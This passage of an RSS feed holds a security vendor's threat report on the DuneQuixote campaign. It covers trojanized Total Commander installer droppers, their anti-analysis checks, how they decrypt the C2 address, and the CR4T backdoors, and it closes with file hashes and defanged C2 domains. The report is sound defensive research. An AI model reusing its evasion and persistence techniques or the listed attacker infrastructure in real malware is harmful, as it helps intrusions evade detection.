1596. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
1597. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
1598. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
1599. </item>
1600. <item>
1601. <title>DuneQuixote campaign targets Middle Eastern entities with &#8220;CR4T&#8221; malware</title>
1602. <link>https://securelist.com/dunequixote/112425/</link>
1603. <comments>https://securelist.com/dunequixote/112425/#respond</comments>
1605. <dc:creator><![CDATA[GReAT]]></dc:creator>
1606. <pubDate>Thu, 18 Apr 2024 10:00:07 +0000</pubDate>
1607. <category><![CDATA[APT reports]]></category>
1608. <category><![CDATA[APT]]></category>
1609. <category><![CDATA[Backdoor]]></category>
1610. <category><![CDATA[Dropper]]></category>
1611. <category><![CDATA[DuneQuixote]]></category>
1612. <category><![CDATA[Malware]]></category>
1613. <category><![CDATA[Malware Descriptions]]></category>
1614. <category><![CDATA[Malware Technologies]]></category>
1615. <category><![CDATA[Middle East]]></category>
1616. <category><![CDATA[Targeted attacks]]></category>
1617. <category><![CDATA[Trojan]]></category>
1618. <category><![CDATA[APT (Targeted attacks)]]></category>
1619. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112425</guid>
1620.  
1621. <description><![CDATA[New unattributed DuneQuixote campaign targeting entities in the Middle East employs droppers disguised as Total Commander installer and CR4T backdoor in C and Go.]]></description>
1622. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
1623. <p>In February 2024, we discovered a new malware campaign targeting government entities in the Middle East. We dubbed it &#8220;DuneQuixote&#8221;; and our investigation uncovered over 30 DuneQuixote dropper samples actively employed in the campaign. These droppers, which exist in two versions – regular droppers and tampered installer files for a legitimate tool named &#8220;Total Commander&#8221;, carried malicious code to download an additional payload in the form of a backdoor we call &#8220;CR4T&#8221;. While we identified only two CR4T implants at the time of discovery, we strongly suspect the existence of others, which may be completely different malware.</p>
1624. <p>The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion methods both in network communications and in the malware code.</p>
1625. <h2 id="initial-dropper">Initial dropper</h2>
1626. <p>The initial dropper is a Windows x64 executable file, although there are also DLL versions of the malware sharing the same functionality. The malware is developed in C/C++ without utilizing the Standard Template Library (STL), and certain segments are coded in pure Assembler. All samples contain digital signatures, which are, however, invalid.</p>
1627. <p>Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls primarily involve string comparison functions, executed without any conditional jumps based on the comparison results.</p>
1628. <div id="attachment_112428" style="width: 805px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112428" class="size-full wp-image-112428" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png" alt="Useless function calls" width="795" height="417" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png 795w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-300x157.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-768x403.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-667x350.png 667w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-740x388.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-534x280.png 534w" sizes="(max-width: 795px) 100vw, 795px" /></a><p id="caption-attachment-112428" class="wp-caption-text">Useless function calls</p></div>
1629. <p>The strings specified in these functions are snippets from Spanish poems. These vary from one sample to another, thereby altering the signature of each sample to evade detection using traditional detection methodologies. Following the execution of decoy functions, the malware proceeds to construct a structure for the necessary API calls. This structure is populated with offsets of Windows API functions, resolved utilizing several techniques.</p>
1630. <p>Initially, the malware decrypts the names of essential Windows core DLLs using a straightforward XOR decryption algorithm. It employs multiple decryption functions to decode strings, where a single function might decrypt several strings. However, in our analysis, we observed samples where each string was decrypted using a dedicated function, each employing a slightly varied decryption algorithm.</p>
1631. <div id="attachment_112429" style="width: 605px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112429" class="size-full wp-image-112429" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png" alt="String decryption algorithm" width="595" height="373" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png 595w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-300x188.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-558x350.png 558w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-447x280.png 447w" sizes="(max-width: 595px) 100vw, 595px" /></a><p id="caption-attachment-112429" class="wp-caption-text">String decryption algorithm</p></div>
1632. <p>Once the necessary strings have been decrypted, the malware uses a standard technique for dynamically resolving API calls to obtain their memory offsets by:</p>
1633. <ul>
1634. <li>retrieving the offset of the Process Environment Block (PEB);</li>
1635. <li>locating the export table offset of <em>kernel32.dll</em>;</li>
1636. <li>identifying the offset for the GetProcAddress function.</li>
1637. </ul>
1638. <p>In the process of obtaining the PEB offset, the malware first decrypts the constant <em>0x60</em>, which is used to locate the PEB64 structure. This approach is of particular interest because, typically, malicious samples or shellcode utilizing this technique opt for a hardcoded plain text constant value for this purpose.</p>
1639. <div id="attachment_112430" style="width: 436px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112430" class="size-full wp-image-112430" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png" alt="Getting PEB structure offset" width="426" height="88" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png 426w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03-300x62.png 300w" sizes="(max-width: 426px) 100vw, 426px" /></a><p id="caption-attachment-112430" class="wp-caption-text">Getting PEB structure offset</p></div>
1640. <p>Next, the malware begins to populate the previously created structure with the offsets of all required functions.</p>
1641. <p>The dropper then proceeds to decrypt the C2 (Command and Control) address, employing a unique technique designed to prevent the exposure of the C2 to automated malware analysis systems. This method involves first retrieving the filename under which the dropper was executed, then concatenating this filename with one of the hardcoded strings from Spanish poems. Following this, the dropper calculates the MD5 hash of the concatenated string, which is then used as a key for decrypting the C2 string.</p>
1642. <div id="attachment_112431" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112431" class="size-large wp-image-112431" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1024x171.png" alt="C2 decryption algorithm" width="1024" height="171" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1024x171.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-300x50.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-768x128.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1536x256.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-740x124.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-800x134.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04.png 1545w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112431" class="wp-caption-text">C2 decryption algorithm</p></div>
1643. <p>Following the decryption of the C2 string, the malware attempts to establish a connection with the C2 server using a specifically hardcoded ID as the user agent to download the payload. During our research of the C2 infrastructure, we found that the payload remains inaccessible for download unless the correct user agent is provided. Furthermore, it appears that the payload may only be downloaded once per victim or is only available for a brief period following the release of a malware sample into the wild, as we were unable to obtain most of the payload implants from active C2 servers.</p>
1644. <p>Once the payload is downloaded into the process&#8217;s memory, the dropper performs a verification check for the &#8220;M&#8221; (<em>0x4D</em> in hexadecimal) magic byte at the start of the memory blob. This check likely serves to confirm that the payload has an MZ file signature, thereby indicating it is a valid executable format.</p>
1645. <h2 id="total-commander-installer-dropper">Total Commander installer dropper</h2>
1646. <p>The Total Commander installer dropper is created to mimic a <a href="https://www.ghisler.com/" target="_blank" rel="noopener">legitimate Total Commander </a>software installer. It is, in fact, the legitimate installer file, but with an added malicious file section (<em>.textbss</em>) and a modified entry point. This tampering results in invalidating the official digital signature of the Total Commander installer.</p>
1647. <p>The installer dropper retains the core functionality of the initial dropper but with several key differences. Unlike the original dropper, it omits the use of Spanish poem strings and the execution of decoy functions. It also implements a series of anti-analysis measures and checks that prevent a connection to C2 resources, if any of the following conditions are true:</p>
1648. <ul>
1649. <li>a debugger is present in the system;</li>
1650. <li>known research or monitoring tools are among running processes;</li>
1651. <li><em>explorer.exe</em> process has more than two instances</li>
1652. <li>any of the following processes are running:
1653. <ul>
1654. <li>&#8220;python.exe&#8221;</li>
1655. <li>&#8220;taskmgr.exe&#8221;</li>
1656. <li>&#8220;procmon.exe&#8221;</li>
1657. <li>&#8220;resmon.exe&#8221;</li>
1658. <li>&#8220;eventvwr.exe&#8221;</li>
1659. <li>&#8220;process_hacker.exe&#8221;</li>
1660. </ul>
1661. </li>
1662. <li>less than 8 GB RAM available;</li>
1663. <li>the position of the cursor does not change over a certain timeframe;</li>
1664. <li>disk capacity is less than 40 GB.</li>
1665. </ul>
1666. <p>If any of the anti-analysis checks fail, the malware returns a value of 1. This specific return value plays a role in the decryption of the C2 server address. It triggers the removal of the first &#8220;h&#8221; from the beginning of the C2 URL (&#8220;<em>https</em>&#8220;), effectively changing it to &#8220;<em>ttps</em>&#8220;. As a result, the altered URL prevents the establishment of a connection to the C2 server.</p>
1667. <h2 id="memory-only-cr4t-implant">Memory-only CR4T implant</h2>
1668. <p>The &#8220;CR4T&#8221; implant is designed with the primary goal of granting attackers access to a console for command line execution on the victim&#8217;s machine. Additionally, it facilitates the download, upload, and modification of files. The malware carries a PDB string in its code:</p><pre class="crayon-plain-tag">"C:\Users\user\Desktop\code\CR4T\x64\Release\CR4T.pdb"</pre><p>
1669. That&#8217;s why we dubbed it &#8220;CR4T&#8221;.</p>
1670. <p>Upon execution by the dropper, the implant initiates a <em>cmd.exe</em> process in a hidden window and establishes two named pipes to enable inter-process communication. It then configures the user agent for communication with the C2 server, embedding the hardcoded value &#8220;TroubleShooter&#8221; as the user agent name for requests to the C2.</p>
1671. <div id="attachment_112432" style="width: 664px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112432" class="size-full wp-image-112432" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png" alt="User-agent string" width="654" height="132" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png 654w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05-300x61.png 300w" sizes="(max-width: 654px) 100vw, 654px" /></a><p id="caption-attachment-112432" class="wp-caption-text">User-agent string</p></div>
1672. <p>After that, the implant retrieves the computer name of the infected host as well as the username of the current user. Then it establishes a connection to the C2 server. This session provides interactive access to the command line interface of the victim&#8217;s machine via the earlier mentioned named pipes. Commands and their outputs are encoded using Base64 before being sent and decoded after receiving.</p>
1673. <p>After establishing the connection, the implant remains idle, awaiting an initial command from the C2 operator to activate the required functionality. This command is represented by a one-byte value, each one mapped to a specific action on the infected system. These single character commands would likely make more sense for an English-speaking developer/operator than a Spanish-speaking one. i.e. &#8220;D&#8221; == Download, &#8220;U&#8221; == Upload (where a Spanish speaker might use &#8220;Cargar&#8221;).</p>
1674. <table width="100%">
1675. <tbody>
1676. <tr>
1677. <td width="25%"><strong>Command</strong></td>
1678. <td width="75%"><strong>Functionality</strong></td>
1679. </tr>
1680. <tr>
1681. <td>&#8216;C'(0x43)</td>
1682. <td>Provide access to the command line interface via a named pipe.</td>
1683. </tr>
1684. <tr>
1685. <td>&#8216;D'(0x44)</td>
1686. <td>Download file from the C2</td>
1687. </tr>
1688. <tr>
1689. <td>&#8216;U'(0x55)</td>
1690. <td>Upload file to the C2</td>
1691. </tr>
1692. <tr>
1693. <td>&#8216;S'(0x53)</td>
1694. <td>Sleep</td>
1695. </tr>
1696. <tr>
1697. <td>&#8220;R&#8221;(0x52)</td>
1698. <td>Exit process</td>
1699. </tr>
1700. <tr>
1701. <td>&#8220;T&#8221;(0x57)</td>
1702. <td>Write to a file (T here possibly stands for a file-write <em>task</em>)</td>
1703. </tr>
1704. </tbody>
1705. </table>
1706. <p>During our investigation, we discovered evidence of a PowerShell file that had been created using the &#8220;T&#8221; command:</p><pre class="crayon-plain-tag">"powershell -c \"Get-ScheduledTask | Where-Object {$_.TaskName -like 'User_Feed_Sync*' -and $_.State -eq 'Running'} | Select-Object TaskName\"</pre><p>
1707. The threat actor was observed attempting to retrieve the names of all scheduled tasks on the infected machine beginning with &#8220;<em>User_Feed_Sync</em>&#8220;. These scheduled tasks were probably created by the Golang version of CR4T for persistence purposes.</p>
1708. <h2 id="memory-only-golang-cr4t-implant">Memory-only Golang CR4T implant</h2>
1709. <p>We also discovered a Golang version of the CR4T implant, which shares similar capabilities with the C version and has a similar string related to the internal naming:</p>
1710. <pre class="crayon-plain-tag">"C:/Users/user/Desktop/code/Cr4tInst/main.go"</pre> </p>
1711. <p>This variant provides a command line console for interaction with infected machines, as well as file download and upload capabilities. It also possesses the functionality to execute commands on the victim&#8217;s machine. A notable difference of this version is its ability to create scheduled tasks using the Golang <a href="https://github.com/go-ole/go-ole">Go-ole</a> library. This library leverages Windows Component Object Model (COM) object interfaces for interacting with the Task Scheduler service.</p>
1712. <div id="attachment_112433" style="width: 716px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112433" class="size-full wp-image-112433" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png" alt=" CR4T using go-ole library" width="706" height="447" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png 706w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-300x190.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-553x350.png 553w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-442x280.png 442w" sizes="(max-width: 706px) 100vw, 706px" /></a><p id="caption-attachment-112433" class="wp-caption-text">CR4T using go-ole library</p></div>
1713. <p>The malware is also capable of achieving persistence by utilizing the <a href="https://cyberstruggle.org/2021/12/14/com-hijacking-for-persistence/" target="_blank" rel="noopener">COM objects hijacking</a> technique. And finally, it uses the Telegram API for C2 communications, implementing the public <a href="https://github.com/go-telegram-bot-api/telegram-bot-api" target="_blank" rel="noopener">Golang Telegram API</a> bindings. All the interactions are similar to the C/C++ version.</p>
1714. <h2 id="infrastructure">Infrastructure</h2>
1715. <p>The infrastructure used in this campaign appears to be located in the US at two different commercial hosters.</p>
1716. <table width="100%">
1717. <tbody>
1718. <tr>
1719. <td width="28%"><strong>Domain</strong></td>
1720. <td width="28%"><strong>IP</strong></td>
1721. <td width="28"><strong>First seen</strong></td>
1722. <td width="16%"><strong>ASN</strong></td>
1723. </tr>
1724. <tr>
1725. <td>commonline[.]space</td>
1726. <td>135.148.113[.]161</td>
1727. <td>2023 -12-16 23:20</td>
1728. <td>16276</td>
1729. </tr>
1730. <tr>
1731. <td>userfeedsync[.]com</td>
1732. <td>104.36.229[.]249</td>
1733. <td>2024-01-10 07:27</td>
1734. <td>395092</td>
1735. </tr>
1736. </tbody>
1737. </table>
1738. <h2 id="victims">Victims</h2>
1739. <p>We discovered victims in the Middle East, as per our telemetry, as early as February 2023. Additionally, there were several uploads to a semi-public malware scanning service at a later stage, more specifically starting on December 12 2023, with more than 30 submissions of the droppers in the period up to the end of January 2024. The majority of these uploads also originated from the Middle East. Other sources we suspect to be VPN exit nodes geo-located in South Korea, Luxembourg, Japan, Canada, Netherlands and the US.</p>
1740. <h2 id="conclusions">Conclusions</h2>
1741. <p>The &#8220;DuneQuixote&#8221; campaign targets entities in the Middle East with an interesting array of tools designed for stealth and persistence. Through the deployment of memory-only implants and droppers masquerading as legitimate software, mimicking the Total Commander installer, the attackers demonstrate above average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and resourcefulness of the threat actors behind this campaign.</p>
1742. <h2 id="indicators-of-compromise">Indicators of Compromise</h2>
1743. <p><strong>DuneQuixote Droppers</strong><br />
1744. <a href="https://opentip.kaspersky.com/3aaf7f7f0a42a1cf0a0f6c61511978d7/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">3aaf7f7f0a42a1cf0a0f6c61511978d7</a><br />
1745. <a href="https://opentip.kaspersky.com/5759acc816274d38407038c091e56a5c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5759acc816274d38407038c091e56a5c</a><br />
1746. <a href="https://opentip.kaspersky.com/606fdee74ad70f76618007d299adb0a4/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">606fdee74ad70f76618007d299adb0a4</a><br />
1747. <a href="https://opentip.kaspersky.com/5a04d9067b8cb6bcb916b59dcf53bed3/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5a04d9067b8cb6bcb916b59dcf53bed3</a><br />
1748. <a href="https://opentip.kaspersky.com/48c8e8cc189eef04a55ecb021f9e6111/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">48c8e8cc189eef04a55ecb021f9e6111</a><br />
1749. <a href="https://opentip.kaspersky.com/7b9e85afa89670f46f884bb3bce262b0/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">7b9e85afa89670f46f884bb3bce262b0</a><br />
1750. <a href="https://opentip.kaspersky.com/4f29f977e786b2f7f483b47840b9c19d/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f29f977e786b2f7f483b47840b9c19d</a><br />
1751. <a href="https://opentip.kaspersky.com/9d20cc7a02121b515fd8f16b576624ef/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">9d20cc7a02121b515fd8f16b576624ef</a><br />
1752. <a href="https://opentip.kaspersky.com/4324cb72875d8a62a210690221cdc3f9/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4324cb72875d8a62a210690221cdc3f9</a><br />
1753. <a href="https://opentip.kaspersky.com/3cc77c18b4d1629b7658afbf4175222c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">3cc77c18b4d1629b7658afbf4175222c</a><br />
1754. <a href="https://opentip.kaspersky.com/6cfec4bdcbcf7f99535ee61a0ebae5dc/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">6cfec4bdcbcf7f99535ee61a0ebae5dc</a><br />
1755. <a href="https://opentip.kaspersky.com/c70763510953149fb33d06bef160821c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c70763510953149fb33d06bef160821c</a><br />
1756. <a href="https://opentip.kaspersky.com/f3988b8aaaa8c6a9ec407cf5854b0e3b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f3988b8aaaa8c6a9ec407cf5854b0e3b</a><br />
1757. <a href="https://opentip.kaspersky.com/cf4bef8537c6397ba07de7629735eb4e/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">cf4bef8537c6397ba07de7629735eb4e</a><br />
1758. <a href="https://opentip.kaspersky.com/1bba771b9a32f0aada6eaee64643673a/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">1bba771b9a32f0aada6eaee64643673a</a><br />
1759. <a href="https://opentip.kaspersky.com/72c4d9bc1b59da634949c555b2a594b1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">72c4d9bc1b59da634949c555b2a594b1</a><br />
1760. <a href="https://opentip.kaspersky.com/cc05c7bef5cff67bc74fda2fc96ddf7b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">cc05c7bef5cff67bc74fda2fc96ddf7b</a><br />
1761. <a href="https://opentip.kaspersky.com/0fdbe82d2c8d52ac912d698bb8b25abc/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">0fdbe82d2c8d52ac912d698bb8b25abc</a><br />
1762. <a href="https://opentip.kaspersky.com/9b991229fe1f5d8ec6543b1e5ae9beb4/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">9b991229fe1f5d8ec6543b1e5ae9beb4</a><br />
1763. <a href="https://opentip.kaspersky.com/5e85dc7c6969ce2270a06184a8c8e1da/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5e85dc7c6969ce2270a06184a8c8e1da</a><br />
1764. <a href="https://opentip.kaspersky.com/71a8b4b8d9861bf9ac6bd4b0a60c3366/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">71a8b4b8d9861bf9ac6bd4b0a60c3366</a><br />
1765. <a href="https://opentip.kaspersky.com/828335d067b27444198365fac30aa6be/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">828335d067b27444198365fac30aa6be</a><br />
1766. <a href="https://opentip.kaspersky.com/84ae9222c86290bf585851191007ba23/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">84ae9222c86290bf585851191007ba23</a><br />
1767. <a href="https://opentip.kaspersky.com/450e589680e812ffb732f7e889676385/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">450e589680e812ffb732f7e889676385</a><br />
1768. <a href="https://opentip.kaspersky.com/56d5589e0d6413575381b1f3c96aa245/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">56d5589e0d6413575381b1f3c96aa245</a><br />
1769. <a href="https://opentip.kaspersky.com/258b7f20db8b927087d74a9d6214919b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">258b7f20db8b927087d74a9d6214919b</a><br />
1770. <a href="https://opentip.kaspersky.com/a4011d2e4d3d9f9fe210448dd19c9d9a/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">a4011d2e4d3d9f9fe210448dd19c9d9a</a><br />
1771. <a href="https://opentip.kaspersky.com/b0e19a9fd168af2f7f6cf997992b1809/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">b0e19a9fd168af2f7f6cf997992b1809</a><br />
1772. <a href="https://opentip.kaspersky.com/0d740972c3dff09c13a5193d19423da1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">0d740972c3dff09c13a5193d19423da1 </a><br />
1773. <a href="https://opentip.kaspersky.com/a0802a787537de1811a81d9182be9e7c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">a0802a787537de1811a81d9182be9e7c</a><br />
1774. <a href="https://opentip.kaspersky.com/5200fa68b6d40bb60d4f097b895516f0/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5200fa68b6d40bb60d4f097b895516f0</a><br />
1775. <a href="https://opentip.kaspersky.com/abf16e31deb669017e10e2cb8cc144c8/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">abf16e31deb669017e10e2cb8cc144c8</a><br />
1776. <a href="https://opentip.kaspersky.com/f151be4e882352ec42a336ca6bff7e3d/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f151be4e882352ec42a336ca6bff7e3d</a><br />
1777. <a href="https://opentip.kaspersky.com/f1b6aa55ba3bb645d3fde78abda984f3/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f1b6aa55ba3bb645d3fde78abda984f3</a><br />
1778. <a href="https://opentip.kaspersky.com/00130e1e7d628c8b5e2f9904ca959cd7/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">00130e1e7d628c8b5e2f9904ca959cd7</a><br />
1779. <a href="https://opentip.kaspersky.com/fb2b916e44abddd943015787f6a8dc35/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">fb2b916e44abddd943015787f6a8dc35</a><br />
1780. <a href="https://opentip.kaspersky.com/996c4f78a13a8831742e86c052f19c20/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">996c4f78a13a8831742e86c052f19c20</a><br />
1781. <a href="https://opentip.kaspersky.com/4f29f977e786b2f7f483b47840b9c19d/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f29f977e786b2f7f483b47840b9c19d</a><br />
1782. <a href="https://opentip.kaspersky.com/91472c23ef5e8b0f8dda5fa9ae9afa94/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">91472c23ef5e8b0f8dda5fa9ae9afa94</a><br />
1783. <a href="https://opentip.kaspersky.com/135abd6f35721298cc656a29492be255/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">135abd6f35721298cc656a29492be255</a><br />
1784. <a href="https://opentip.kaspersky.com/db786b773cd75483a122b72fdc392af6/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">db786b773cd75483a122b72fdc392af6</a></p>
1785. <p><strong>Domains and IPs </strong><br />
1786. <a href="https://opentip.kaspersky.com/Commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">Commonline[.]space </a><br />
1787. <a href="https://opentip.kaspersky.com/g1sea23g.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">g1sea23g.commonline[.]space</a><br />
1788. <a href="https://opentip.kaspersky.com/tg1sea23g.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SLtarget="_blank" rel="noopener">tg1sea23g.commonline[.]space</a><br />
1789. <a href="https://opentip.kaspersky.com/telemetry.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.commonline[.]space</a><br />
1790. <a href="https://opentip.kaspersky.com/telemetry.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">e1awq1lp.commonline[.]space</a><br />
1791. <a href="https://opentip.kaspersky.com/mc.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">mc.commonline[.]space</a><br />
1792. <a href="https://opentip.kaspersky.com/userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">userfeedsync[.]com</a><br />
